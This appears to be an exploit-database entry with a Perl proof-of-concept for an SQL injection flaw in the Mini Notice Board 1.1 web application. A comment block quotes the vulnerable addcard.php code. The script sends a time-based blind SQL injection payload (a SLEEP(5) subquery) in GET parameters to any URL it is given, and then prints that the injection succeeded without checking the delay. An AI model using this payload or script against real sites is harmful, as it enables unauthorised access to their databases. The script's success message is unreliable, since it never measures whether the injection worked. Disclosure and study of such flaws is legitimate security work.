Mini Notice Board 1.1 SQL Injection



EKU-ID: 5990 CVE: OSVDB-ID:
Author: N_A Published: 2016-11-04 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/perl -w

#mininoticeboard_v1.1 SQL Injection Exploit
#==========================================


#Discovered by N_A , N_A[at]tutanota.com
#========================================


#Vendor has been notified
#=========================


#Description
#============

#Mini Notice Board is a small noticeboard application that allows users to post notice cards online. e.g. if people want to sell their car 
#or lawnmower or want to provide services, they can simply write a card. 
#It supports unlimited Regions.

#https://sourceforge.net/projects/mininoticeboard/


#Vulnerability
#=============

#addcard.php:

#The variables from the GET request are fed unsanitized directly into the MYSQL database resulting in an SQL Injection

#$title       = $_GET["title"];
#$body        = $_GET["body"];
#$contact     = $_GET["contact"];
#$address     = $_GET["address"];
#$tel         = $_GET["tel"];
#$date_day    = date("d");
#$date_month  = date("m");
#$date_year   = date("y");
#$romovalcode = genremovalcode();
#$categorie   = $cid;

#if($title!="" && $body!="" && $tel!="" && $contact!="")

#{

#	include 'dbconnect.php';
#	$sqlset["tablename"] = $sqlset["tableprefix"].'content';
#	mysql_query('INSERT INTO `'.$sqlset["tablename"].'` (`title`, `content`, `contact`, `address`, `tel`, `date_day`, `date_month`, `date_year`, #`removalcode`, `categorie`) VALUES (\''.$title.'\', \''.$body.'\', \''.$contact.'\', \''.$address.'\', \''.$tel.'\', \''.$date_day.'\',  
#\''$date_month.'\', \''.$date_year.'\', \''.$romovalcode.'\', \''.$categorie.'\')') or $status = 'red';




#Proof Of Concept Exploit attached below

#N_A, N_A[at]tutanota.com




use strict;
use LWP::Simple;


my ($url) = @ARGV;
if( not defined $url )
{	
	
   print "=========================================\n";
   print "Mini Notice Board SQL Injection Exploit\n";
   print "\tBy N_A\n";
   print "\n";
   print "$0  [URL]\n";
   print "$0 127.0.0.1/mininoticeboard\n";
   print "=========================================\n";
   exit;
}


my $file = '/addcard.php';                                   #The Vulnerable .php file
my $injection = 'title=pentest&body=blah\' OR (SELECT * FROM (SELECT(SLEEP(5)))jAEh) AND \'OKSG\'=\'OKSG&tel=555&contact=blahblah&address=blahblah&submit=Add+Card'; 


my $request ="http://".$url.$file."?".$injection;             #Forming the exploit string
my $content = get $request;
die "Could not get $request" unless defined $content;

#It should hang here for about 5 seconds..... (SLEEP(5)) as per injection

print "##########################\n";
print "SQL Injection Successful!\n";
print "##########################\n"